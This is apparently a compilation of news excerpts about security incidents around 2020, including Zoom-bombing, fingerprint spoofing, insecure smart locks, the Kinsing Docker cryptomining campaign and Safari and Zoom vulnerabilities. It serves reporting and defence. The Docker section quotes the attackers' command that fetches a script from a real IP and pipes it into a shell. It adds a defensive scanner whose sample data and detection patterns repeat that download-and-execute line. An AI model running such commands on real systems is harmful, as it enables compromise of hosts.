Stanislascollege Pijnacker also stops using Zoom over ‘images that cross the line’: porn and a Hitler moustache during German class

PIJNACKER – The Stanislascollege in Pijnacker is stopping immediately with the use of the video app Zoom for giving online lessons. The school has received several reports from pupils, parents and teachers that images or texts which cross the line are being shown during lessons.

On Wednesday the Erasmus College in Zoetermeer also decided to stop using Zoom immediately, after pupils were shown pornographic images during an online lesson. The Stanislascollege has six schools, spread across Delft, Pijnacker and Rijswijk.

‘In most cases the images or texts appear to be shown by persons who are not connected to the school and who have gained unlawful access to the lesson,’ the school writes in a letter to parents.

Hitler moustache during German lesson

According to regional director Fons Loogman of Stichting Lucas Onderwijs, which the Stanislascollege falls under, there have been small incidents. ‘Pupils forward an invitation link to third parties, who can then also watch the lesson; you have no control over that. For example, during a German lesson a Hitler salute or a Hitler moustache was shown somewhere.’

However, the incident with pornographic images in Zoetermeer was the deciding factor for the school in Pijnacker to stop using Zoom. ‘In addition, over the past week we had already been alerted to reports from the IT world that Zoom is not secure. They collect information, there are insecure security structures and it is easy to hack,’ says Loogman.

Source: Stanislascollege Pijnacker stopt ook met Zoom door ‘beelden die niet door de beugel kunnen’ – Omroep West

Porn during online lesson at Zoetermeer school, so the school stops using Zoom

ZOETERMEER – Pupils of a class at the Erasmus College in Zoetermeer were shown pornographic images on Wednesday morning during a lesson via the video app Zoom. The school has immediately stopped using Zoom.

‘We understand that you are terribly shocked,’ the school writes in an email to the pupils concerned. ‘Of course we have immediately stopped all Zoom lessons and are looking at another method for teaching at home.’

Director-administrator Roderik Rot confirms that pornographic images were shown and that all lessons have been stopped for that reason. ‘Yes, there was one class in which that briefly happened.’ Rot cannot say how many pupils were involved: ‘A class never consists of more than thirty pupils, and usually not all pupils are present at those online lessons.’ He declines to say which lesson it was, for privacy reasons. The school offered pupils the option of contacting a support team if they wished, but as far as is known nobody made use of it.

Stopped online lessons

The Erasmus College has therefore now stopped using Zoom immediately. According to Rot, the school had already set that in motion. An external privacy adviser had already said that Zoom could be used under strict conditions, but that he nevertheless recommended other programs. ‘So yesterday we informed all the parents that we are going to switch to something else, and that we are busy working on it.’

[…]

IDs shared insecurely

According to the Delft cybersecurity company Fox-IT, it is unlikely that Zoom itself was hacked. Security expert Sanne Maasakkers: ‘Zoom is a very large software company where many people work on security every day.’ According to Maasakkers, it is more plausible that invitation codes ended up in the hands of people who were not invited to the meeting.

Every participant gets such an ID. If it is not protected with a password, outsiders can break into a Zoom meeting, which is much harder with a password, unless a participant has been hacked themselves.

Source: Porno tijdens online les van Zoetermeerse school: ‘Onwaarschijnlijk dat Zoom is gehackt’ – Omroep West

No, it is not really ‘hacked’ in the sense that its security is so bad that you can just enter an ID and send random porn to it.

Attackers can bypass fingerprint authentication with an ~80% success rate

For decades, the use of fingerprints to authenticate users to computers, networks, and restricted areas was (with a few notable exceptions) mostly limited to large and well-resourced organizations that used specialized and expensive equipment. That all changed in 2013 when Apple introduced TouchID. Within a few years, fingerprint-based validation became available to the masses as computer, phone, and lock manufacturers added sensors that gave users an alternative to passwords when unlocking the devices.

Although hackers managed to defeat TouchID with a fake fingerprint less than 48 hours after the technology was rolled out in the iPhone 5S, fingerprint-based authentication over the past few years has become much harder to defeat. Today, fingerprints are widely accepted as a safe alternative over passwords when unlocking devices in many, but not all, contexts.

A very high probability

A study published on Wednesday by Cisco’s Talos security group makes clear that the alternative isn’t suitable for everyone—namely those who may be targeted by nation-sponsored hackers or other skilled, well-financed, and determined attack groups. The researchers spent about $2,000 over several months testing fingerprint authentication offered by Apple, Microsoft, Samsung, Huawei, and three lock makers. The result: on average, fake fingerprints were able to bypass sensors at least once roughly 80 percent of the time.

The percentages are based on 20 attempts for each device with the best fake fingerprint the researchers were able to create. While Apple products limit users to five attempts before asking for the PIN or password, the researchers subjected the devices to 20 attempts (that is, multiple groups of one or more attempts). Of the 20 attempts, 17 were successful. Other products tested permitted significantly more or even an unlimited number of unsuccessful tries.

Tuesday’s report was quick to point out that the results required several months of painstaking work, with more than 50 fingerprint molds created before getting one to work. The study also noted that the demands of the attack—which involved obtaining a clean image of a target’s fingerprint and then getting physical access to the target’s device—meant that only the most determined and capable adversaries would succeed.

“Even so, this level of success rate means that we have a very high probability of unlocking any of the tested devices before it falls back into the PIN unlocking,” Talos researchers Paul Rascagneres and Vitor Ventura wrote. “The results show fingerprints are good enough to protect the average person’s privacy if they lose their phone. However, a person that is likely to be targeted by a well-funded and motivated actor should not use fingerprint authentication.”

Source: Attackers can bypass fingerprint authentication with an ~80% success rate | Ars Technica

Google Bans Zoom Videoconferencing Software From Employees’ Computers

Google has banned the popular videoconferencing software Zoom from its employees’ devices, BuzzFeed News has learned. Zoom, a competitor to Google’s own Meet app, has seen an explosion of people using it to work and socialize from home and has become a cultural touchstone during the coronavirus pandemic.

Last week, Google sent an email to employees whose work laptops had the Zoom app installed that cited its “security vulnerabilities” and warned that the videoconferencing software on employee laptops would stop working starting this week.

“We have long had a policy of not allowing employees to use unapproved apps for work that are outside of our corporate network,” Jose Castaneda, a Google spokesperson, told BuzzFeed News. “Recently, our security team informed employees using Zoom Desktop Client that it will no longer run on corporate computers as it does not meet our security standards for apps used by our employees. Employees who have been using Zoom to stay in touch with family and friends can continue to do so through a web browser or via mobile.”

Source: Google Bans Zoom Videoconferencing Software From Employees’ Computers

Easy-to-pick “smart” locks gush personal data, FTC finds

A padlock—whether it uses a combination, a key, or “smart” tech—has exactly one job: to keep your stuff safe so other people can’t get it. Tapplock, Inc., based in Canada, produces such a product. The company’s locks unlock with a fingerprint or an app connected by Bluetooth to your phone. Unfortunately, the Federal Trade Commission said, the locks are full of both digital and physical vulnerabilities that leave users’ stuff, and data, at risk.

The FTC’s complaint (PDF) against Tapplock, released Monday, basically alleges that the company misrepresented itself, because it marketed its products as secure and tested when they were neither. A product—any product—simply being kind of crappy doesn’t necessarily fall under the FTC’s purview. Saying untrue things about your product in your advertisement or privacy policy, however, will make the commission very unhappy with you indeed.

“We allege that Tapplock promised that its Internet-connected locks were secure, but in fact the company failed to even test if that claim was true,” Andrew Smith, director of the FTC’s Bureau of Consumer Protection, said in a written statement. “Tech companies should remember the basics—when you promise security, you need to deliver security.”

Tapplock’s advertisements say its flagship product, the Tapplock One, can store up to 500 user fingerprints and can be connected to an “unlimited” number of devices through the app—a design optimized for something many people need to be able to access and for which handing off a physical key is impractical. To make the $99 lock work, Tapplock collects a great deal of personal information on its users, including usernames, email addresses, profile photos, location history, and the precise location of a user’s lock.

[…]

The lock may be built with “7mm reinforced stainless steel shackles, strengthened by double-layered lock design with anti-shim and anti-pry technologies,” as Tapplock’s website promises, but according to the FTC, perhaps it should have considered anti-screwdriver technologies. As it turns out, a researcher was able to unlock the lock “within a matter of seconds” by unscrewing the back panel. Oops.

The complaint also pointed to several “reasonably foreseeable” software vulnerabilities that the FTC alleges Tapplock could have avoided if the company “had implemented simple, low-cost steps.”

One vulnerability security researchers identified allowed a user to bypass the account authentication process entirely in order to gain full access to the account of literally any Tapplock user, including their personal information. And how could this happen? “A researcher who logged in with a valid user credential could then access another user’s account without being re-directed back to the login page, thereby allowing the researcher to circumvent Respondent’s authentication procedures altogether,” the complaint explains.

A second vulnerability allowed researchers the ability to access and unlock any lock they could get close enough to with a working Bluetooth connection. That’s because Tapplock “failed to encrypt the Bluetooth communication between the lock and the app,” leaving the data wide open for the researchers to discover and replicate.

The third vulnerability outlined in the complaint also has to do with a failure to secure communication data. That app that allows “unlimited” connections? The primary owner can of course add and revoke authorized users from the lock. But someone whose access was revoked could still access the lock because the vulnerability allowed for sniffing out the relevant data packets.

How’d this happen?

And how did Tapplock fail to discover any of these weaknesses? Because the company did not have a security program prior to the third-party researchers’ discoveries, the FTC alleges.

Source: Easy-to-pick “smart” locks gush personal data, FTC finds | Ars Technica

Zoom banned by Taiwan’s government over China security fears

Zoom has been banned from government business in Taiwan in the latest setback for the hugely popular video-calling app.

It follows revelations that some Zoom traffic was “mistakenly” routed through China, which does not recognise Taiwan’s independence.

Taiwan’s government said public bodies should not use products with security concerns “such as Zoom”.

But competitors like Google and Microsoft were acceptable, it said.

China considers Taiwan a breakaway rebel province, destined to be reunited with the mainland.

Last week, researchers discovered that some traffic from the video-calling app was being sent through Beijing – even when all participants on the Zoom call were in North America.

The team from University of Toronto’s Citizen Lab also highlighted that Zoom has several hundred employees in mainland China, which “could also open up Zoom to pressure from Chinese authorities”.

Zoom said the traffic was “mistakenly” routed through Beijing, and apologised.

Despite the response from Zoom, Taiwan has told its public institutions to use other software.

Where possible, domestic solutions should be used, it said, adding that in special circumstances, Google or Microsoft’s apps were acceptable. Those firms operate the Duo and Skype services respectively.

It is the latest blow to Zoom, which has exploded in popularity during the coronavirus pandemic, resulting in increased scrutiny.

Source: Zoom banned by Taiwan’s government over China security fears – BBC News

If you don’t cover your Docker daemon API port you’ll have a hell of a time… because cryptocreeps are hunting for it

Some Docker installations are getting hammered by malware skiddies hoping to mine digital cash using other people’s CPU time.

Infosec outfit Aqua – no, not the Barbie Girl band – said miscreants have spotted that a decent number of Docker deployments are lazily or inadvertently exposing the daemon API port to the public internet with no protection. It’s a fairly common error that hackers have exploited in the past to mine digital coins, although lately we’re told there have been thousands of infection attempts daily via this interface, all involving a piece of Linux malware dubbed Kinsing.

“These are the highest numbers we’ve seen in some time, far exceeding what we have witnessed to date,” noted researcher Gal Singer this week.

“We therefore believe that these attacks are directed by actors with sufficient resources and the infrastructure needed to carry out and sustain such attacks, and that this is not an improvised endeavor.”

If an open system is found, the attacker tells it to create and run a custom Ubuntu container that executes the following command:

/bin/bash -c apt-get update && apt-get install -y wget cron;service cron start; wget -q -O - 142.44.191.122/d.sh | sh;tail -f /dev/null

The fetched d.sh script disables SELINUX security protections, as well as searches out and removes any other malware or cryptomining containers already running on the infected machine. That way it won’t have to compete for CPU time. It uses crontab to ensure it stays running every minute, and a bunch of other stuff: it’s 600 lines long.

The script also downloads the Kinsing malware proper, and runs it. This software nasty tries to make contact with one of four command and control servers in Eastern Europe for any special orders to carry out on the infected system. It also runs a script, called spre.sh, that uses any SSH keys it finds to log into and spread to other machines to run its code.

“The spre.sh shell script that the malware downloads is used to laterally spread the malware across the container network,” Aqua’s Singer said.

“In order to discover potential targets and locate the information it needs to authenticate against, the script passively collects data from /.ssh/config, .bash_history, /.ssh/known_hosts, and the likes. We did not identify any active scanning techniques used to identify additional targets.”

Once that is done, the mining component of the malware is finally executed.

[Figure: Kinsing malware diagram, a diagram of the attack process]

The Register has pinged Docker for comment on the attacks. In the meantime, Singer and Aqua recommend blocking the IP addresses linked to this outbreak. It’s also highly recommended you don’t leave the daemon API port facing the internet, and use policies and configurations to limit what systems are allowed to talk to the interface.

“Identify all cloud resources and group them by some logical structure,” said the team. “Review authorization and authentication policies, basic security policies, and adjust them according to the principle of least privilege. Investigate logs, mostly around user actions, look for actions you can’t account for, anomalies.”
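Two checks a defender would want after reading the above, written here as an added example (not Aqua’s or The Register’s code): an audit of the local dockerd configuration for a TCP API listener without client-certificate verification, and a scan of `docker inspect`-shaped container records for the fetch-script-pipe-to-shell-then-`tail -f /dev/null` command pattern. The daemon.json, ExecStart line and container records are constructed samples, and the download host is a placeholder, not the address from the article.

```python
"""Audit a Docker daemon for an exposed, unauthenticated API port, and flag containers
whose command line matches the download-and-execute pattern described above."""
import json
import re
import shlex
from urllib.parse import urlsplit

# --- Constructed sample inputs (not taken from any real host) ---------------------
WEAK_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
WEAK_EXEC_START = ("ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375 "
                   "--containerd=/run/containerd/containerd.sock")
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,                      # clients must present a cert signed by the CA
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})
# Shaped like `docker inspect` output; the download host is a placeholder, not the real one.
SAMPLE_CONTAINERS = [
    {"Id": "a1b2c3", "Name": "/web", "Config": {"Entrypoint": None,
        "Cmd": ["nginx", "-g", "daemon off;"]}},
    {"Id": "d4e5f6", "Name": "/hopeful_swirles", "Config": {"Entrypoint": None,
        "Cmd": ["/bin/bash", "-c", "apt-get update && apt-get install -y wget cron;"
                "service cron start; wget -q -O - stager.example.invalid/d.sh | sh;"
                "tail -f /dev/null"]}},
]

def tcp_hosts_from_daemon_json(text):
    """Return (tcp listeners, client-cert verification enabled) from daemon.json."""
    cfg = json.loads(text)
    tcp = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    return tcp, bool(cfg.get("tlsverify"))

def tcp_hosts_from_exec_start(line):
    """Same, but from a systemd ExecStart= line carrying dockerd flags."""
    cmd = line.split("=", 1)[1] if line.startswith("ExecStart=") else line
    args = shlex.split(cmd)
    hosts, tlsverify, i = [], False, 0
    while i < len(args):
        a = args[i]
        if a in ("-H", "--host") and i + 1 < len(args):
            hosts.append(args[i + 1]); i += 2; continue
        if a.startswith("--host="):
            hosts.append(a.split("=", 1)[1])
        elif a.startswith("-H") and len(a) > 2:           # -Htcp://... form
            hosts.append(a[2:])
        elif a in ("--tlsverify", "--tlsverify=true"):
            tlsverify = True
        i += 1
    return [h for h in hosts if h.startswith("tcp://")], tlsverify

def assess_listeners(tcp_hosts, tlsverify):
    """Grade each TCP listener: without a client-cert check, anyone who can reach the
    port can create containers, which is exactly the opening the article describes."""
    findings = []
    for h in tcp_hosts:
        host = urlsplit(h).hostname or ""
        bound_everywhere = host in ("", "0.0.0.0", "::")
        if not tlsverify:
            sev = "CRITICAL" if bound_everywhere else "HIGH"
            findings.append((sev, h, "API over TCP without client certificate verification"))
        elif bound_everywhere:
            findings.append(("MEDIUM", h, "TLS-verified API bound to all interfaces; "
                             "bind to a management address or firewall it"))
    return findings

# Pattern from the article: fetch a remote script, pipe it straight into a shell,
# then keep the container alive with an endless tail.
PIPE_TO_SHELL = re.compile(r"\b(wget|curl)\b[^|;]*\|\s*(ba)?sh\b")
KEEPALIVE = re.compile(r"tail\s+-f\s+/dev/null")

def flag_download_and_run(containers):
    """Return (name, reason) for containers whose command line matches the pattern."""
    hits = []
    for c in containers:
        cfg = c.get("Config", {})
        cmdline = " ".join((cfg.get("Entrypoint") or []) + (cfg.get("Cmd") or []))
        if PIPE_TO_SHELL.search(cmdline):
            reason = "remote script piped into a shell"
            if KEEPALIVE.search(cmdline):
                reason += " + tail -f /dev/null keep-alive"
            hits.append((c.get("Name", c.get("Id", "?")), reason))
    return hits

if __name__ == "__main__":
    checks = {"daemon.json": tcp_hosts_from_daemon_json(WEAK_DAEMON_JSON),
              "ExecStart": tcp_hosts_from_exec_start(WEAK_EXEC_START),
              "hardened": tcp_hosts_from_daemon_json(HARDENED_DAEMON_JSON)}
    for label, (hosts, tv) in checks.items():
        print(label, assess_listeners(hosts, tv) or "ok")
    print(flag_download_and_run(SAMPLE_CONTAINERS))
```

On a live host, feed the functions the contents of /etc/docker/daemon.json, the dockerd unit’s ExecStart line and the output of `docker inspect $(docker ps -q)`.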

Source: If you don’t cover your Docker daemon API port you’ll have a hell of a time… because cryptocreeps are hunting for it • The Register

American schools are banning Zoom and switching to Microsoft Teams

After many schools adopted Zoom to conduct online lessons during the coronavirus lockdown, concerns about security and privacy have led to a ban on the video conferencing software across the US.

The chancellor of New York City’s Department of Education Richard A Carranza sent an email to school principals telling them to “cease using Zoom as soon as possible”. And he is not alone; schools in other parts of the country have taken similar action, and educators are now being trained to use Microsoft Teams as this has been suggested as a suitable alternative, partly because it is compliant with FERPA (Family Educational Rights and Privacy Act).


Large numbers of teachers spent time learning how to use Zoom to continue educating pupils who are confined to their homes. But growing criticism of Zoom for its approach to privacy and security has given cause for a rethink. Documents seen by Chalkbeat show that principals in NYC have been told: “Based on the DOE’s review of those documented concerns, the DOE will no longer permit the use of Zoom at this time”.

The Washington Post quotes Danielle Filson, spokesperson for the NYC Education Department, as saying:

Providing a safe and secure remote learning experience for our students is essential, and upon further review of security concerns, schools should move away from using Zoom as soon as possible. There are many new components to remote learning, and we are making real-time decisions in the best interest of our staff and students. We will support staff and students in transitioning to different platforms such as Microsoft Teams that have the same capabilities with appropriate security measures in place.

The Post also reports that Clark County Public Schools in Nevada were also moving away from Zoom, saying in a statement that the decision had been taken to “disable access to Zoom out of an abundance of caution due to instances of hacking that created unsafe environments for teachers and students”.

Schools in Utah, Washington state and beyond are also looking into Zoom alternatives.

Source: American schools are banning Zoom and switching to Microsoft Teams

Zoom’s Flawed Encryption Linked to China

Meetings on Zoom, the increasingly popular video conferencing service, are encrypted using an algorithm with serious, well-known weaknesses, and sometimes using keys issued by servers in China, even when meeting participants are all in North America, according to researchers at the University of Toronto.

The researchers also found that Zoom protects video and audio content using a home-grown encryption scheme, that there is a vulnerability in Zoom’s “waiting room” feature, and that Zoom appears to have at least 700 employees in China spread across three subsidiaries. They conclude, in a report for the university’s Citizen Lab — widely followed in information security circles — that Zoom’s service is “not suited for secrets” and that it may be legally obligated to disclose encryption keys to Chinese authorities and “responsive to pressure” from them.

Source: Zoom’s Flawed Encryption Linked to China

Zoom Bombings Started Off as Pranks. Now Someone Could End Up Dead

For those unaware, Zoom officially has a porn problem. The multibillion-dollar video messaging mainstay among employees at Johnson & Johnson and the Department of Homeland Security—not to mention a household name among currently house-bound citizens across the country—has been rocked by story after story of pranksters popping into video meetings with clips of graphic porn or Nazi memorabilia. None of Zoom’s clients, seemingly, are safe: These Zoom bombs have hit city council members and churches alike. They’ve hit Chipotle.

The idea of having our work-from-home happy hours disrupted by someone splicing in something porn-y or Hitler-y is disturbing, and that’s where it usually ends: annoyance, disgust, shock—which is ultimately the response that these posters are trying to incite. But a Gizmodo investigation into multiple Discord chatrooms dedicated to coordinating these attacks revealed that the practice has a far darker side that can leave victims scarred for life—or far worse.

Zoom-based “bombs” and “raids” are typically the forte of high and middle school students whose classes are now almost exclusively taking place on the platform. From last month onward, Zoom’s rolled out a series of changes specifically catering to the educators it has onboard, from lifting the 40-minute limit on free meetings internationally to partnering with Logitech to offer free cameras and headsets to teachers who might need them. This gesture of goodwill promptly blew up in the company’s face when these students quickly realized that the codes and passwords needed to access a given Zoom meeting could be freely shared, leading a select few to coordinate with other students nationwide to spearhead a wave of raids in classrooms across the country.


Teens, in general, have a thing for Discord, a popular chat platform, and Discord is where these raids are coordinated. The platform’s long track record of raids on every platform led it to wedge a statement into its community guidelines explicitly disavowing raids as a “form of harassment.” Now that those raids have hit Zoom, Discord’s been actively booting off some users that are particularly active in a given raid channel, while unceremoniously shutting those channels down left and right.

This crackdown, along with the shuttering of raid-based communities on Reddit like the creatively named r/zoomraids, means that a lot of these channels are hard to find, and that finding them isn’t a guarantee that it’ll exist the next day. Over the course of this story, Gizmodo joined about 15 raid channels—some racking up more than 800 members a pop. By the time you’re reading this, there are at most six left standing—and for the most part, they are hidden behind server names that don’t mention Zoom at all. Discord told Gizmodo in an email that it had removed more than 350 servers for Zoom bombing just this morning.

“This behavior violates Discord’s terms of service, and we strongly condemn it,” a spokesperson told Gizmodo in a statement. “Once we identify those servers engaging in this sort of activity, we quickly investigate and take action, including removing content, banning users and shutting down those servers.”

The bulk of these servers, overall, are made up of teens not only swapping Zoom links back and forth but overall just… being typical edgelord teens—joking about the Holocaust (ironically), using racial slurs (ironically), and sharing a ton of porn (ironically?). Less ironic, but just as dark, are the materials shared back and forth to make these campaigns a reality. Multiple channels that Gizmodo joined had created a roster of Google documents listing the Zoom codes of hundreds of support groups in the U.S., along with the days and times each one would meet. Similar documents were created to target meetings for other at-risk groups, like LGBTQ and trans teens.

[Screenshot: Gizmodo (Discord). The Wednesday meetings from the manifesto detailing nearly 200 meetings happening weekly nationwide. Zoom codes are censored.]

Depending on who you ask, raids on recovery groups are either lame, funny, fucked, or some combination of the three. Each of the Discord channels had a list of rules seemingly tailored to throw admins off the scent of the channel’s true purpose. One server’s rulebook stated that its one goal was to “support our fellow students and adults through their hard day of work by surprising them in their online meetings.” Another server for raid planning included the rule, “DO NOT RAID I DO NOT CONDONE IT.”

In many of the channels, all Zoom calls are fair game, whether it’s a Narcotics Anonymous meeting or a kindergarten classroom. Rules aside, the only limit to what’s being shared is in the hands of the poster: Some think playing footage of the 2019 Christchurch Mosque shooting in the middle of an NA meeting is a bridge too far, while others don’t. Some think exposing 9- and 10-year-olds to hardcore porn is too shitty, while others think the line should be drawn at middle schoolers and above.

As one user put it, “this discord freakin showed porn to kindergardners but wont raid an narcotics [anonymous]? y’all soft.”


While Zoom’s yet to respond to our request for comment, the company is undoubtedly aware of its raiding problem. Late last month, it put out an official blog post about “keeping uninvited guests” out of Zoom meetings, which reminds users, “When you share your meeting link on social media or other public forums, that makes your event … extremely public. ANYONE with the link can join your meeting.”

Some of the channels Gizmodo joined did, indeed, set up scrapers and dedicated bots specifically to monitor a Zoom link shared on a given platform. But just as many used a much easier tool: Google search. As confirmed by Gizmodo, public-facing Zoom links share a specific string of characters that, when plugged into Google search (or “dorked,” in internet parlance), will turn up dozens of upcoming Zoom meetings. Trying the search term ourselves, we were able to pull links for Zooms dedicated to hot yoga, wine tasting, and legal advice—all in less than a minute—not to mention more than a few Zooms dedicated to parents and their kids.

Putting young children at risk of exposure to horrifying imagery comes up more frequently than you might think, since Zoom’s teacher-friendly packages apply to preschool teachers as much as they do to college professors. And just like Zoom bombings aimed at high school classes, the reactions of these young children can be passed around in videos recorded by the bombers. In the barely 24 hours we spent joining more than a dozen channels, one video—which showed the confused reactions of second graders being exposed to graphic hardcore pornography in the middle of their class—was frequently shared.

For what should be obvious reasons, we didn’t join any of the many, many raids linked at any given time, so we can’t specify what other young children might be seeing. If we’re assuming the worst, then that means some kids on these video calls are being exposed to footage of decapitation or shootings from sites like Bestgore and LiveLeak, along with any porn scenario you can imagine. Assuming the best-case scenario, the porn’s still there, but the murders aren’t. In either case, kids are at risk: Psychologists have been telling us for years that exposing children to hardcore pornography bumps up the chance that they’ll either become the victim of sexual assault or end up assaulting someone themselves. The types of horrific violence you’d find on any gore site can haunt children who see them for the rest of their lives, leading to PTSD or drug abuse.


And when it comes to meetings involving drug abuse, the harm done by these kinds of bombings cannot be overstated. As one Business Insider employee—and Alcoholics Anonymous member—recently explained, the isolation that comes with coronavirus-mandated quarantines is incredibly dangerous for those struggling with addiction:

We are all in our separate homes. And that can be dangerous, because alcoholics are notorious for isolating, for withdrawing from social situations — sometimes with a bottle.

If you drink normally, you may be wondering, ‘Why not just drink — even if you have a problem? Right now, while locked down, who could that hurt?’ I can answer that. I drank myself into the emergency room years ago. I know many people who did. Do you think hospitals need that right now? Do you think healthcare workers need to deal with millions of people whose immune systems are severely compromised by binge drinking?


The risk of relapse doesn’t just come for alcoholics, but anyone with any addiction. As one recent Rolling Stone report detailed, these sorts of weekly meetings can turn into not only a place to discuss their road to recovery but also a place that feels safe to talk about their inarguably valid fears surrounding the current pandemic. When that support line is intercepted—by an edgy teen or otherwise—a recovering addict can lose that tenuous feeling of safety and withdraw from meetings with the support group keeping them clean.

Without that network, some folks fare well and others don’t, with relapse being a bigger risk to those earlier on in recovery, as the Business Insider report explains. For some addictions, like opioids, a relapse can turn deadly shockingly fast. As pointed out by the Centers for Disease Control in 2018, some 70 percent of the tens of thousands of annual drug overdoses in the U.S. happen because of opiate addiction.

Of course, people being dangerously shitty to each other is nothing new. Nor are online pranks. What makes Zoom bombing so wretched is that it’s happening at a time when millions of us are stuck inside with nowhere to go except, perhaps, into a video call with our friends and family, teachers, and support communities—our last tethers to the lives we used to have.

Source: Zoom Bombings Started Off as Pranks. Now Someone Could End Up Dead

A Hacker Found a Way to Take Over Any Apple Webcam

Apple patched the vulnerabilities in January and March updates. But before the fixes, all a victim would have needed to do is click one malicious link and an attacker would have been able to spy on them remotely.

“Safari encourages users to save their preferences for site permissions, like whether to trust Skype with microphone and camera access,” says Ryan Pickren, the security researcher who disclosed the vulnerabilities to Apple. “So what an attacker could do with this kill chain is make a malicious website that from Safari’s perspective could then turn into ‘Skype’. And then the malicious site will have all the permissions that you previously granted to Skype, which means an attacker could just start taking pictures of you or turn on your microphone or even screen-share.”

The bugs Pickren found all stem from seemingly minor oversights. For example, he discovered that Safari’s list of the permissions a user has granted to websites treated all sorts of URL variations as being part of the same site, like https://www.example.com, http://example.com, and fake://example.com. By “wiggling around,” as Pickren puts it, he was able to generate specially crafted URLs that could work with scripts embedded in a malicious site to launch the bait-and-switch that would trick Safari.
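The permission-list confusion described above comes down to how a browser keys its stored grants. As an added illustration (this is constructed example code, not Safari’s or Pickren’s), the model below stores a “camera” grant for https://www.example.com under two keying schemes: a naive hostname-only key, which treats the same look-alike URLs from the article as one site, and a strict (scheme, host, port) origin key, under which the look-alikes get nothing. The fourth probe URL (a non-default port) and the PermissionStore class are assumptions added for the demonstration.

```python
from urllib.parse import urlsplit

# Default ports per scheme, so that https://example.com and https://example.com:443 are one origin.
DEFAULT_PORTS = {"http": 80, "https": 443}


def naive_site_key(url):
    """Flawed key: collapses every URL to a bare hostname, ignoring scheme and port."""
    host = (urlsplit(url).hostname or "").lower()
    return host[4:] if host.startswith("www.") else host


def origin_key(url):
    """Strict key: the web origin (scheme, host, port). Unknown schemes get no origin at all."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    if scheme not in DEFAULT_PORTS or not host:
        return None  # opaque origin: can never match a stored grant
    port = parts.port if parts.port is not None else DEFAULT_PORTS[scheme]
    return (scheme, host, port)


class PermissionStore:
    """Remembers per-site grants such as 'camera' or 'microphone', keyed by key_func(url)."""

    def __init__(self, key_func):
        self._key = key_func
        self._grants = {}

    def grant(self, url, permission):
        key = self._key(url)
        if key is None:
            raise ValueError("refusing to store a grant for an origin-less URL: " + url)
        self._grants.setdefault(key, set()).add(permission)

    def allowed(self, url, permission):
        key = self._key(url)
        return key is not None and permission in self._grants.get(key, set())


def demo(key_func):
    """Grant camera access to the trusted site, then probe look-alike URLs. Returns {url: allowed}."""
    store = PermissionStore(key_func)
    store.grant("https://www.example.com", "camera")
    # The first three probes are the URL variations named in the article; the last is an added one.
    probes = ["https://www.example.com", "http://example.com",
              "fake://example.com", "https://example.com:8443"]
    return {u: store.allowed(u, "camera") for u in probes}


if __name__ == "__main__":
    print("hostname-only key:", demo(naive_site_key))
    print("origin key:       ", demo(origin_key))
```

The defensive point is that a grant must be looked up by the full origin, and a URL whose scheme the browser does not recognise must map to no origin at all rather than to the hostname it happens to contain.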

“I just kind of hammered the browser with really weird cases until Safari got confused and gave an origin that didn’t make sense,” he says. “And eventually the bugs could all kind of bounce from one to the next. Part of this is that some of the bugs were really, really old flaws in the WebKit core from years ago. They probably were not as dangerous as they are now just because the stars lined up on how an attacker would use them today.”

A hacker who tricked a victim into clicking their malicious link would be able to quietly launch the target’s webcam and microphone to capture video, take photos, or record audio. And the attack would work on iPhones, iPads, and Macs alike. None of the flaws are in Apple’s microphone and webcam protections themselves, or even in Safari’s defenses that keep malicious sites from accessing the sensors. Instead, the attack surmounts all of these barriers just by generating a convincing disguise.

Pickren submitted seven vulnerabilities to Apple’s bug bounty program in mid-December and says he got a response that the company had validated the bugs the next day. While an attacker would only exploit three of the bugs to take over webcams in the chain Pickren envisioned, he found other, related flaws along the way that he submitted as well. Pickren says that part of the reason he encountered so many extra bugs was that he was looking for an attack chain that would work on both iOS and macOS—and Safari is designed slightly differently for each.

Source: A Hacker Found a Way to Take Over Any Apple Webcam | WIRED

Ex-NSA hacker drops new zero-day doom for Zoom

Zoom’s troubled year just got worse.

Now that a large portion of the world is working from home to ride out the coronavirus pandemic, Zoom’s popularity has rocketed, but also has led to an increased focus on the company’s security practices and privacy promises. Hot on the heels of two security researchers finding a Zoom bug that can be abused to steal Windows passwords, another security researcher found two new bugs that can be used to take over a Zoom user’s Mac, including tapping into the webcam and microphone.

Patrick Wardle, a former NSA hacker and now principal security researcher at Jamf, dropped the two previously undisclosed flaws on his blog Wednesday, which he shared with TechCrunch.

The two bugs, Wardle said, can be launched by a local attacker — that’s where someone has physical control of a vulnerable computer. Once exploited, the attacker can gain and maintain persistent access to the innards of a victim’s computer, allowing them to install malware or spyware.

Wardle’s first bug piggybacks off a previous finding. Zoom uses a “shady” technique — one that’s also used by Mac malware — to install the Mac app without user interaction. Wardle found that a local attacker with low-level user privileges can inject the Zoom installer with malicious code to obtain the highest level of user privileges, known as “root.”

Those root-level user privileges mean the attacker can access parts of the underlying macOS operating system that are typically off-limits to most users, making it easier to run malware or spyware without the user noticing.

The second bug exploits a flaw in how Zoom handles the webcam and microphone on Macs. Zoom, like any app that needs the webcam and microphone, first requires consent from the user. But Wardle said an attacker can inject malicious code into Zoom to trick it into giving the attacker the same access to the webcam and microphone that Zoom already has. Once Wardle tricked Zoom into loading his malicious code, the code will “automatically inherit” any or all of Zoom’s access rights, he said — and that includes Zoom’s access to the webcam and microphone.

“No additional prompts will be displayed, and the injected code was able to arbitrarily record audio and video,” wrote Wardle.

Because Wardle dropped detail of the vulnerabilities on his blog, Zoom has not yet provided a fix. Zoom also did not respond to TechCrunch’s request for comment.

In the meanwhile, Wardle said, “if you care about your security and privacy, perhaps stop using Zoom.”

Source: Ex-NSA hacker drops new zero-day doom for Zoom | TechCrunch

Zoom User Warning: This Is How Attackers Could Steal Windows Passwords

Today, news of a Zoom issue affecting Microsoft Windows users. The Zoom Windows client is at risk from a flaw in the chat feature that could allow attackers to steal the logins of people who click on a link, according to tech site Bleeping Computer.

When using Zoom, it’s possible for people to communicate with each other via text message in a chat interface. When a chat message is sent containing a URL, this is converted into a hyperlink that others can click on to open a webpage in their browser.

